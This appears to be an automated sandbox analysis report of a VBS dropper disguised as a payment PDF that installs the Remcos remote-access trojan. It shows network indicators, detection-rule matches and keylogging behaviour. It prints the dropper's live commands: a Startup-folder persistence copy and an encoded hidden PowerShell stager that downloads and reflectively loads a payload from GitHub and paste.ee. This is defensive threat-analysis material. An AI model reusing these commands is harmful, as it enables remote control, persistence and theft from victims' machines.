                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49772 -> 64.188.16.157:35890
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50003 -> 64.188.16.157:35890
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49920 -> 64.188.16.157:35890
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49999 -> 64.188.16.157:35890
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50001 -> 64.188.16.157:35890
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50005 -> 64.188.16.157:35890
                Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.5:49761 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 188.114.97.3:443 -> 192.168.2.5:49761
                Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 188.114.97.3:443 -> 192.168.2.5:49761
                Source: Malware configuration extractorURLs: ab9001.ddns.net
                Source: unknownDNS query: name: paste.ee
                Source: global trafficTCP traffic: 64.188.16.157 ports 35890,0,3,5,8,9
                Source: unknownDNS query: name: ab9001.ddns.net
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
                Source: global trafficTCP traffic: 192.168.2.5:49772 -> 64.188.16.157:35890
                Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /d/fb4UJ/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 64.188.16.157 64.188.16.157
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
                Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00424A66 recv,11_2_00424A66
                Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /d/fb4UJ/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                Source: global trafficDNS traffic detected: DNS query: paste.ee
                Source: global trafficDNS traffic detected: DNS query: ab9001.ddns.net
                Source: AddInProcess32.exeString found in binary or memory: http://geoplugin.net/json.gp
                Source: powershell.exe, 00000008.00000002.2331620773.000002001007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2331620773.000002001111A000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                Source: powershell.exe, 00000008.00000002.2305231614.00000200019B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2331620773.000002001007E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000008.00000002.2305231614.0000020000517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.ee
                Source: powershell.exe, 00000008.00000002.2305231614.0000020001958000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2305231614.000002000172E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000008.00000002.2305231614.00000200016E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
                Source: powershell.exe, 00000005.00000002.2241105087.000001F12F76C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2383250210.000001FC48BC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2305231614.0000020000001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000008.00000002.2305231614.000002000172E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: powershell.exe, 00000008.00000002.2305231614.0000020001958000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2305231614.000002000172E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000005.00000002.2241105087.000001F12F71A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                Source: powershell.exe, 00000005.00000002.2241105087.000001F12F74A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2383250210.000001FC48BF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2383250210.000001FC48C0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2305231614.0000020000001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000008.00000002.2305231614.0000020000517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                Source: powershell.exe, 00000008.00000002.2305231614.0000020000517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                Source: powershell.exe, 00000008.00000002.2305231614.0000020000517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                Source: powershell.exe, 00000008.00000002.2305231614.0000020000517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                Source: powershell.exe, 00000008.00000002.2331620773.000002001007E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000008.00000002.2331620773.000002001007E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000008.00000002.2331620773.000002001007E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000008.00000002.2305231614.0000020000517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                Source: powershell.exe, 00000008.00000002.2305231614.0000020000517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                Source: powershell.exe, 00000008.00000002.2305231614.0000020001958000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2305231614.000002000172E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000008.00000002.2305231614.0000020000F3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000008.00000002.2305231614.00000200019B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2331620773.000002001007E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000008.00000002.2305231614.000002000172E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                Source: powershell.exe, 00000008.00000002.2305231614.000002000172E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                Source: powershell.exe, 00000008.00000002.2305231614.000002000042B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee
                Source: powershell.exe, 00000008.00000002.2305231614.000002000042B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/fb4UJ/0
                Source: powershell.exe, 00000008.00000002.2305231614.00000200016E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
                Source: powershell.exe, 00000008.00000002.2305231614.0000020000223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2305231614.0000020001660000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                Source: powershell.exe, 00000008.00000002.2305231614.0000020000223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2305231614.0000020000F3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
                Source: powershell.exe, 00000008.00000002.2305231614.0000020000223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt3dK;
                Source: powershell.exe, 00000008.00000002.2305231614.0000020000517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                Source: powershell.exe, 00000008.00000002.2305231614.0000020000517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                Source: powershell.exe, 00000008.00000002.2305231614.0000020000517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: powershell.exe, 00000008.00000002.2305231614.0000020000517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                Source: powershell.exe, 00000008.00000002.2305231614.0000020000517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49761 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00409340 SetWindowsHookExA 0000000D,0040932C,0000000011_2_00409340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,11_2_0040A65A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,11_2_00414EC1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,11_2_0040A65A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,11_2_00409468

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 8.2.powershell.exe.20011562480.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.20011562480.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3435406338.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3435406338.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3436141535.0000000002DDF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2331620773.000002001007E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2331620773.000002001111A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3836, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 6308, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\remcos\logs.dat, type: DROPPED

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0041A76C SystemParametersInfoW,11_2_0041A76C

                System Summary

                barindex
                Source: 8.2.powershell.exe.20011562480.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 8.2.powershell.exe.20011562480.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 8.2.powershell.exe.20011562480.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 8.2.powershell.exe.20011562480.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 8.2.powershell.exe.20011562480.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 00000008.00000002.2331620773.000002001007E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000008.00000002.2331620773.000002001111A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 3180, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3836, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 3836, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: AddInProcess32.exe PID: 6308, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: PAYMENT SPECIFIKACIJA 364846637-pdf.vbsStatic file information: Suspicious name
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadilibisnapxe.vbs')')
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadilibisnapxe.vbs')')
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRFblY6Y09tU1BlY1s0LDE1LDI1XS1KT0lOJycpKCAoJ1NIc3VybCAnKyc9JysnIDNkS2h0JysndCcrJ3BzOicrJy8vJysncmEnKyd3LmdpdGgnKyd1YnVzZScrJ3Jjb250ZW50LmNvbS9Ob0QnKydldCcrJ2VjdE9uL05vRGUnKyd0ZWN0T24vcmVmcy9oZWFkcy9tYWluL0RldCcrJ2FoTm90aC1WLicrJ3QnKyd4JysndDNkSycrJzsgJysnU0hzJysnYmFzZTY0Q29udGUnKydudCA9ICcrJyhOZXctTycrJ2JqZScrJ2N0JysnICcrJ1MnKyd5c3RlJysnbS5OZScrJ3QuV2ViQ2xpZW50KS5EbycrJ3dubG9hZFN0cmluZyhTSHN1cmwnKycpOyAnKydTSHNiaW5hcnknKydDb250JysnZW50ID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0JysncmluZyhTSHMnKydiYXNlNicrJzQnKydDb250ZW50KTsnKycgU0hzYXNzZW1iJysnbHkgPSBbUicrJ2VmbGVjJysndGlvbi5Bc3NlbWJseV06OicrJ0xvYWQoU0hzJysnYicrJ2luYScrJ3J5Q29udCcrJ2VudCk7JysnIFtkbmxpYi5JTy5IJysnb21lXTo6VkFJKGVXJysnQTAvSlU0YmYvZC9lZScrJy4nKydldHNhcC8vOnNwdHQnKydoZVdBLCAnKydlJysnV0FkJysnZXNhdGl2YWRvZScrJ1dBLCBlV0FkZXNhdGknKyd2YWQnKydvZVdBLCBlJysnV0FkZXNhdCcrJ2l2YWRvZVdBLCBlJysnV0FBZCcrJ2RJblByb2Nlc3MzJysnMmVXQSwgZScrJ1cnKydBZVdBLGVXQWUnKydXQSknKS5yRXBsYWNFKChbY0hBcl0xMDErW2NIQXJdODcrW2NIQXJdNjUpLFtzVHJJbmddW2NIQXJdMzQpLnJFcGxhY0UoJ1NIcycsW3NUckluZ11bY0hBcl0zNikuckVwbGFjRSgoW2NIQXJdNTErW2NIQXJdMTAwK1tjSEFyXTc1KSxbc1RySW5nXVtjSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadilibisnapxe.vbs')')Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRFblY6Y09tU1BlY1s0LDE1LDI1XS1KT0lOJycpKCAoJ1NIc3VybCAnKyc9JysnIDNkS2h0JysndCcrJ3BzOicrJy8vJysncmEnKyd3LmdpdGgnKyd1YnVzZScrJ3Jjb250ZW50LmNvbS9Ob0QnKydldCcrJ2VjdE9uL05vRGUnKyd0ZWN0T24vcmVmcy9oZWFkcy9tYWluL0RldCcrJ2FoTm90aC1WLicrJ3QnKyd4JysndDNkSycrJzsgJysnU0hzJysnYmFzZTY0Q29udGUnKydudCA9ICcrJyhOZXctTycrJ2JqZScrJ2N0JysnICcrJ1MnKyd5c3RlJysnbS5OZScrJ3QuV2ViQ2xpZW50KS5EbycrJ3dubG9hZFN0cmluZyhTSHN1cmwnKycpOyAnKydTSHNiaW5hcnknKydDb250JysnZW50ID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0JysncmluZyhTSHMnKydiYXNlNicrJzQnKydDb250ZW50KTsnKycgU0hzYXNzZW1iJysnbHkgPSBbUicrJ2VmbGVjJysndGlvbi5Bc3NlbWJseV06OicrJ0xvYWQoU0hzJysnYicrJ2luYScrJ3J5Q29udCcrJ2VudCk7JysnIFtkbmxpYi5JTy5IJysnb21lXTo6VkFJKGVXJysnQTAvSlU0YmYvZC9lZScrJy4nKydldHNhcC8vOnNwdHQnKydoZVdBLCAnKydlJysnV0FkJysnZXNhdGl2YWRvZScrJ1dBLCBlV0FkZXNhdGknKyd2YWQnKydvZVdBLCBlJysnV0FkZXNhdCcrJ2l2YWRvZVdBLCBlJysnV0FBZCcrJ2RJblByb2Nlc3MzJysnMmVXQSwgZScrJ1cnKydBZVdBLGVXQWUnKydXQSknKS5yRXBsYWNFKChbY0hBcl0xMDErW2NIQXJdODcrW2NIQXJdNjUpLFtzVHJJbmddW2NIQXJdMzQpLnJFcGxhY0UoJ1NIcycsW3NUckluZ11bY0hBcl0zNikuckVwbGFjRSgoW2NIQXJdNTErW2NIQXJdMTAwK1tjSEFyXTc1KSxbc1RySW5nXVtjSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadilibisnapxe.vbs')')Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess Stats: CPU usage > 49%
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,11_2_00414DB4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF8485C4FF18_2_00007FF8485C4FF1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848692F058_2_00007FF848692F05
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0042515211_2_00425152
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0043528611_2_00435286
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_004513D411_2_004513D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0045050B11_2_0045050B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0043651011_2_00436510
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_004316FB11_2_004316FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0043569E11_2_0043569E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0044370011_2_00443700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_004257FB11_2_004257FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_004128E311_2_004128E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0042596411_2_00425964
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0041B91711_2_0041B917
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0043D9CC11_2_0043D9CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00435AD311_2_00435AD3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00424BC311_2_00424BC3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0043DBFB11_2_0043DBFB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0044ABA911_2_0044ABA9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00433C0B11_2_00433C0B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00434D8A11_2_00434D8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0043DE2A11_2_0043DE2A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0041CEAF11_2_0041CEAF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00435F0811_2_00435F08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00402073 appears 51 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00432B90 appears 53 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00432525 appears 41 times
                Source: PAYMENT SPECIFIKACIJA 364846637-pdf.vbsInitial sample: Strings found which are bigger than 50
                Source: 8.2.powershell.exe.20011562480.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 8.2.powershell.exe.20011562480.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 8.2.powershell.exe.20011562480.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
